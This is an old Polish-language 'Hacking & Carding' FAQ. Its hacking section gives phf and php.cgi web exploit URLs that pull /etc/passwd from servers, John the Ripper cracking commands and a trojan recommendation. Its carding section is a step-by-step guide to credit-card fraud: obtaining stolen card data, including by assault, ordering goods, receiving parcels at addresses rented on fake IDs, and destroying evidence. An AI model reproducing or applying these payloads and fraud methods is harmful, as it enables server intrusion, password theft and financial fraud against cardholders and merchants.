---------------------------------------------Hacking-&-Carding------------------------------------- ,$$$$$$$$$. ,$$$$$$. ,$$$$$$$$. `$$$$$$$$$$$. `$$$$$$$. `$$$$$$$$; $$$. ,$$$$. ,$$$$$$. :$. :$. :$$$$. :$$. ,$$$$$$. ,$. $$$$$$$$$$$$$. :$$$$$$$$. :$. :$; :. : :$$. `$$$$$$$$$$$$$. :$. :$$. :$$$$$$$$. :$$$$$$$; ,$$$$$$$$. :$$. ,$$. :$. :$. :$$. :$. :$$. ,$$$$$$$$$. :$. :$$$$$$$$. :$$. :$$. :$. :$. :$$. :$. :$$. `$. :$. :$. ,$. :$$. :$$. :$$. :$. :$. :$$. $$$$$. `$$$$. `$$$. `$$$. `$$$$$$$$. `$$$$$. `$$$$$$$$$$$$$$$$$$$; `$$$; `$; `$$$. ---------------------------------------------FAQ--ver.-1.0----------------------------------------- Indegz:-------------------------------------------------------------------------------------------- 0. Wprowadzenie. I. Hacking: 1. Podstawowe komendy w UNIXie. 2. passwd 3. Exploity. 4. Phf/php - dziury w WWW. 5. Konie trojanskie. 6. {EOF} II. Credit Cards. 1. Skad wziasc? 2. Co jest co? 3. Co z tym robic? 4. Gdzie zamawiac? 5. Co to za e-mail? 6. Gdzie to odebrac? 7. I co dalej??? 8. {EOF} III. Kontakt i fajne sajty. Koniec Indegzu------------------------------------------------------------------------------------- Wprowadzenie:-------------------------------------------------------------------------------------- Na samym wstepie chcialbym uprzedzic, ze czesc o Hackingu zawarta w tym FAQ'u jest na bardzo niskim poziomie i tym samym prosze osoby uwazajace sie za hackerow na ominiecie calego punktu pierwszego, czesc o kartach kredytowych mysle ze jest juz na znacznie wyzszym poziomie i moze was troszke zaciekawic. Punkt trzeci, czyli "Kontak i fajne sajty" jest jak sama nazwa wskazuje punktem info i prosze tam zagladac tylko czasami:). OSTREZENIE Wszystkie wiadomosci zawarte w tym pliku txt sa szkodliwe dla spoleczenstwa, wiec jesli jestes dobrym obywatelem, ktory nawet nie mysli o tym by "wlazic" na czyis komputer, to skasuj ten plik natychmiast, reszte natomiast zapraszam do lektury:))) Koniec Wprowadzenia-------------------------------------------------------------------------------- Hacking-------------------------------------------------------------------------------------------- 1. Podstawowe komendy... ls - odpowiednik dosowskiego DIR - wyswietla zawartosc katalogow cd - wejscie do katalogu cat - wyswitlenie zawartosci pliku rm - usuniecie pliku pico - prosty edytor tekstu startx - GUI - Graphic User Interface - odpowiednik WIN'9x tyle ze lepszy:) pine - program e-mailowy fetchmail - program do sciagania poczty POP3 dip - program do laczenia sie z providerem... usage: $dip -t dip> port /dev/cuax #w miejsce x wpisujesz numer portu COM, ale dla COM1 piszesz /dev/cua0, a dla COM2 /dev/cua1 ... i tak po kolei dip> speed 115200 #max speed - zalezy od modemu dip> term atdt 0202122 #oczywiscie moze byc tez atdp dla wypierania pulsowego czekamy czekamy ppp ppp Ctrl-] dip> get $local 0.0.0.0 dip> mode PPP $ #i szalejemy po sieci:) mc - odpowiednik Norton Commandera - Midnight Commander cp - kopiowanie chmod - zmiana dostepu do pliku chown - zmiana wlasciciela pliku chattr - zmiana atrybutow pliku ftp - klient ftp telnet - klient telnet lynx - textowa przegladarka WWW chfn - zmiana danych o userze (w komendzie finger) finger - info o userze pwconv - konwerter passwd - najprostszy sposob na shadowanie plikow ps - wyswietla aktywne procesy kill - zabija proces mount - podmontowanie urzadzenia umount - odmontowanie urzadzenia gcc - kompilator *.c tar - kompresowanie plikow zip - kopresowanie plikow gzip - kopresowanie plikow ok . tyle wam na poczatek starczy A teraz troszke o katalogach: /tmp - temporary - pliki tymczasowe /home/ - katalogi uzytkownikow /root - katalog administratora /etc - pliki konfiguracyjne - w tym passwd /usr - ...potrzebne pliki, programy... /bin - polecenia i programy systemowe /dev - urzadzenia /var - katalog tymczasowy - logi ... ... 2. passwd Plik passwd jest plikiem w ktorym znajduja sie hasla dla wszystkich uzytkownikow. Znajduje sie on w katalogu /etc i jezeli na danym serwerze nie ma shadowingu to ma on nazwe... passwd:). a jezeli jest shadowing to jest roznie... spotkalem sie z shadow, shadow-, master.passwd (FreeBSD). W przypadku gdy nie ma shadowingu to kazda linijka odpowiada jednemu uzytkownikowi, a wyglada ona tak: zenek:CeZiA32ji3:501:500:Zenek Pospieszalski:/home/zenek:/bin/bash A po kolei znaczy to: user:zak.haslo:UID-numerusera:GID-numergrupy:pelnedane:homedir:shell Jezeli plik bylby shadowowany to w miejscu zakodowanego haslo bylby znak x. Aby wyciagnac haslo uzytkownika zenka musimy posiadac jeden program crackujacy np: John The Ripper (THE BEST), Jack The Cracker, Brute Force itd. Ja oczywiscie polecam John'a. Nalezy go uzywac tak: C:\> John.com -pwfile:plik_z_haslami -wordfile:slownik -rules lub jezeli nie mamy slownika to: C:\> John.com -pwfile:plik_z_haslami -single Proste czyz nie? Jezeli John znajdzie jakies haslo to na ekranie pojawi sie ono w takiej postaci: mojehaslo (zenek) Czyli haslo a w nawiasie uzytkownik:). Proste... 3. Exploity sa malymi programikami ktore wykorzystuje dziury w roznych systemach by zdobyc np: root shella'a, passwd, wyczyszczenie logow itd. Sa one najczesciej napisane w jezyku C. Nie bede sie tu o nich rozpisywal, wystarczy jezeli wymienie dwa pod RedHata 5.0 - xfree i mh_expl. Jezeli chcialbys jakiegoskolwiek exploita miec to zajrzyj do moich linkow na koncu FAQ'a. 4. Phf/php - dziury w WWW. Dziwne, nie? Jak mozna poprzez World Wide Web wyciagnac jakis plik, uruchomic... a jednak mozna, dzieki cgi. Jednak na nowszych serwerach te metody juz nie dzialaja, ale znajdziecie z penwoscia jakies na ktorych bez problemu uda wam sie wyciagnac passwd lub cos innego. A dziala to tak - musicie to wpisac w przegladarce jak zwykly URL (polecam Netscape'a:)): http://xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd http://xxx.xxx.xxx/cgi-bin/php.cgi?/etc/passwd Oczywiscie w miejce xxx.xxx.xxx musicie wpisac adres serwera np: www.radio.opole.pl. I haselka znajduja sie juz na monitorze. A dalej to juz chyba wiecie co robic... JOHN THE RIPPER. 5. Konie trojanskie. Mianem konia trojanskiego nazywamy program ktory ma "dwa oblicza". Z wygladu jest zwyklym fajnym programikiem, natomiast jego druga strona, to dzialalnosc "szpiegowska", czyli wyciaganie hasel, plikow i dla zagorzalych fanow... destrukcja (nie popieram). Te programiki zadomowily sie juz na kazdym systemie, sa trojany pod win 95, Linuxa, Unixa... Pod WIN 95 polecam przede wszystkim trojana T5port.exe autorstwa [ULT0R]'a. Jest wedlug mnie swietny. A po inne zapraszam do H@CKPL ZINE 5. Naprawde warto. 6. {EOF} Na koncu chcialbym jeszcze raz napisac, ze tekst o hacku byl na bardzo niskim poziomie merytorycznym i postaram sie w kolejnej jego wersji cos ulepszyc, a jak sie komus kur** nie podoba to niech sobie czyta faqa P0WER'a. Koniec Hackingu--------------------------------------------------------------------------------------------------- Credit Cards------------------------------------------------------------------------------------------------------ 1 Skad wziasc? Jest na to wiele sposobow. Mozna isc bezposrednio do banku i bawic sie w podgladanie, mozna podejsc do goscia w ciemnej uliczce i zajebac mu 5 razy a potem wziasc sobie CC, mozna... i mozna oczywiscie na IRCu, ale ta metoda jest malo skuteczna jezeli nie posiadamy zadnej karty, gdyz watpie zeby ktos dal wam karte tak za nic. Najwazniejsze to jest to, zeby na karcie byly conajmniej trzy dane : Imie i nazwisko goscia, CC# i data waznosci. 2. Co jest co? Ponizej przedstawie wam pewna prawidlowosc, dzieki czemu bedziecie mogli odrozniac karty np. ta jest VISA, a ta AMEX. Wszystko zalezy od pierwszych liczb na numerze karty: VISA Standard ------------------- VISA Classic 4XXX XXX XXX XXX VISA Gold 4XXX XXXX XXXX XXXX Mastercard 5XXX XXXX XXXX XXXX Eurocard 5XXX XXXX XXXX XXXX American Express 37XX XXXXXX XXXXX American Express Gold 3XXXXX XXXXXXXX XXXXXXX Carte Blanche 38XXX XXXX XXXXX Club S ------------------- Discovercard 6XXX XXXX XXXX XXXX DinersClub 3AXX XXXXXX XXXX JCB 35XX XXXX XXXX XXXX Jak sami widzicie liczby pierwsze np. dla VISY sa stale a reszta sie oczywiscie zmienia. 3. Co z tym robic? Jak to co. Zamawiac i zamawiac, kupowac xxx passwords i dalej zamawiac... kupowac konta e-mailowe i dalej.... I tak caly czas dopoki nas nie zlapia. Ja preferuje zamawianie z Internet Cafe, gdyz gdy z tamtad zamowisz i nie podasz Shipping Adress jako twoj domowy to moga ci GOWNO zrobic... 4. Gdzie zamawiac? Szukajcie jak najlepiej sklepow z USA, lub Europy zachodniej, oto przykladowe: www.warehouse.com www.cdrom.com www.tigerdirect.com Wejdzcie tam i sie rozejrzyjcie a na pewno kazdy znajdzie cos dla siebie, a o takich adresach to chyba nie musze juz pisac: www.babylon-x.com www.redlight.com www.teenporn.com Bleh...... 5. Co to za e-mail? Po zamowieniu najczesciej dostajemy e-mailem zawiadomienie, ze nasze zamowienie zostalo przyjete, wyglada ono mniej wiecej tak: Dear Imie Nazwisko, Thank you for shopping with us! Here is a summary of your purchase: Product# Name Quantity Price ---------- ------------------------------------------ -------- ---------- XXXXXX 32MB DIMM SDRAM 4x64 3.3V 2K 66MHZ 10ns 1 $129.95 Subtotal: $129.95 Sales Tax: $0.00 *Shipping: $4.95 Total Amount: $134.90 ---------------------------------------------------------------------------- If you have any queries regarding your order please refer to Purchase Order #numerzakupu. Please allow 4 hrs for us to receive and process your order. We will contact you through e-mail regarding any issues pertaining to the order. I jezeli takie cos otrzymamy, a po czterech godzinach nie dostaniemy e-maila ze nie moga nam tego wyslac to znaczy, ze zamowienie albo juz jest w drodze, albo nic nie dostaniemy, nalezy teraz czekac gdzies okolo 2 tygodni i wypatrywac przesylke, za ktora tez musimy zaplacic podatek i clo, a obliczamy to w ten sposob: wartosc towaru x ( clo + podatek ) x kurs $ czyli np : 1000 $ x ( 5% + 22 % ) x 3,6 1000 $ x 22% x 3,6 = 972 zl No to by bylo na tyle... 6. Gdzie to odebrac? Ten tekst nie jest dla kamikaze, ktorzy zamawiaja do domu, lecz dla ludzi traktujacych to powaznie i dbajacych o swoje dobro:). Zamawiajcie najlepiej na mieszkanie wynajete na fake dowod osobisty, lub na cokolwiek nie majacego z wami zadnego zwiazku, nie do kolegow, ktorzy w razie wpadki i tak was wsypia... a jak juz musicie do domu to najlepiej nie na swoje imie lecz na ojca, matki ... lub siostry. Jest to po prostu niebezpieczne. 7. I co dalej? Jak to co? Dalej sobie zamawiajcie. Tylko nie mozecie trzymac zadnych e-maili dotyczacych CC i potwierdzajacych zakup, sa to dowody swiadczace przeciwko wam, wiec lepiej troszke uwazajcie. Usuwajcie wszystko co jest o CC lub dobrze to ukryjcie, albo zakodujcie (PGP r0x). 8. {EOF} Pamietajcie jednak, ze jest to przestepstwo, czyli jest to nielegalne i za to mozna spedzic ladne pare latek w wiezieniu, czy naprawde warto? Mi sie wydaje, ze jesli wszystko jest dobrze obmyslone i zaplanowane to nie ma szansy sie nie powiesc, jezeli natomiast ktos jest malo ostrozny lub po prostu glupi i zamawia z domu swojego do swojego domu i w dodatku wszystkie maile trzyma na HD i sie chwali kumplom to ma bardzo male szanse na pozostanie na wolnosci. POWODZENIA! Koniec Credit Cards---------------------------------------------------------------------------------------------- Kontakt i fajne sajty-------------------------------------------------------------------------------------------- Piszcie do mnie na: URLs: www.rootshell.com www.netspace.org hack.netpol.pl astalavista.box.sk www.kki.net.pl/hackers www.playboy.com www.polbox.com/n/napalm Koniec FAQ'a-----------------------------------------------------------------------------------------------------